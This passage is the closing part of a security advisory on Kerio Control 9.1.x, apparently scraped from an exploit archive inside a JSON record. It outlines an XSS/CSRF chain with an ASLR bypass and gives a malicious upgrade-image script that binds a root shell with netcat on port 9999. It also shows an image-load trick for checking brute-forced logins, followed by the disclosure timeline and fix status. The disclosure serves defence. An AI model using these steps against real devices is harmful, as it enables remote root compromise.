uses the CSRF bypass and the identified XSS\r\n vulnerability to embed a malicious script inside the Kerio Control website\r\n -) The attacker's website iframes the Kerio Control website to trigger the\r\n execution of the XSS payload\r\n -) The XSS payload runs on the same domain and can therefore send requests\r\n and read responses. This means the attacker can send requests to\r\n getLoginType.js.php to obtain a memory pointer.\r\n -) If the memory pointer is within a specific range (e.g. the highest nibble\r\n is zero), it's a pointer to the heap. In such a case the RCE vulnerability\r\n can be used to crash and restart the server. After that the same check can\r\n be done again.\r\n -) If the memory pointer points near a stack (highest nibble is 0xb), the\r\n pointer can be used to calculate the base address of a stack.\r\n -) Now the attacker knows the location of a stack (all stacks are marked as\r\n readable, writeable and executable). He can now easily bypass ASLR and DEP.\r\n \r\n \r\n8) Remote Code Execution as administrator\r\nAn attacker can create a malicious upgrade image with the following\r\ncommands:\r\ncat upgrade.sh\r\n#!/bin/bash\r\nnc -lp 9999 -e /bin/bash &\r\n \r\ntar czf upgrade.tar.gz *\r\nmv upgrade.tar.gz upgrade.img\r\n \r\nThe image can be uploaded in the administrative web interface.\r\nThis will bind a root shell on port 9999. The complete attack can also be\r\nconducted via the cross site scripting vulnerability described in this\r\nadvisory (XSS in contentLoader.php). This enables an attacker to conduct\r\nthe attack from the Internet to obtain a reverse shell on Kerio Control.\r\n \r\n \r\n9) Login not protected against brute-force attacks\r\nValid credentials can be obtained via a brute-force attack.\r\nIt's enough to send a POST request to /internal/dologin.php with the\r\nparameters kerio_username and kerio_password set. A remote attacker\r\ncan detect if the credentials are correct without reading the\r\nresponse (SOP would not allow to read the response). This is possible\r\nbecause /internal/photo will only return a valid image if the user is\r\ncurrently logged in. The attacker can load an image from this URL and\r\ncheck if loading was successful to leak the information if the\r\ncredentials are valid or not.\r\nThe following code demonstrates this:\r\n<img src=\"https://<Kerio-IP>/internal/photo\" onerror=not_logged_in();\r\nonload=logged_in();></img>\r\n \r\n \r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe following product versions were found to be vulnerable which were the\r\nlatest versions available at the time of the discovery:\r\nv9.1.0 (Build 1087)\r\nv9.1.1 (Build 1324)\r\n \r\n \r\nVendor contact timeline:\r\n------------------------\r\n2016-08-29: Contacting vendor through website\r\n (bug report: [email\u00a0protected]) Ticket-ID: MYW-768664\r\n2016-08-31: No answer, contacting CTO of Kerio via email\r\n2016-09-01: Received security contact with PGP & S/MIME certificate\r\n2016-09-01: Transmission of PGP encrypted advisory to Kerio\r\n2016-09-09: Received answer, Kerio confirms vulnerabilities 1,2,3,5,6,7\r\n Statement to vulnerability 9:\r\n \"the feature already is in the product.\"\r\n Statement to vulnerabilities 4 (Webserver running with root\r\n privileges) and 8 (Remote Code Execution as administrator):\r\n \"I do not consider this a vulnerability\"\r\n Update including a fix will be available on 2016-09-20\r\n2016-09-09: SEC Consult informed Kerio to re-think the decision\r\n not fixing the vulnerabilities 4, 8 and 9\r\n SEC Consult highly recommends to fix all reported issues\r\n2016-09-13: SEC Consult informed Kerio that the advisory will be\r\n released on 2016-09-22\r\n2016-09-20: Kerio releases patch for Kerio Control\r\n2016-09-22: Coordianted release of security advisory\r\n \r\n \r\nSolution:\r\n---------\r\nThe vendor has released version 9.1.3 on 20th September which, according\r\nto the vendor, fixes the vulnerabilities 1,2,3,5,6,7.\r\n \r\nThe vendor told us the following regarding vulnerability 9:\r\n\"the feature already is in the product\"\r\n \r\nVulnerability 4 and 8 are not considered a vulnerability by the vendor\r\nand will not be fixed.\r\nSEC Consult strongly recommended fixing issue 4 and 8 as well.\r\n \r\nThe latest version can be downloaded from here:\r\nhttp://www.kerio.com/support/kerio-control\r\nhttp://www.kerio.com/support/kerio-control/release-history\r\n \r\n \r\nWorkaround:\r\n-----------\r\nNone\r\n \r\n \r\nAdvisory URL:\r\n-------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24808"}]}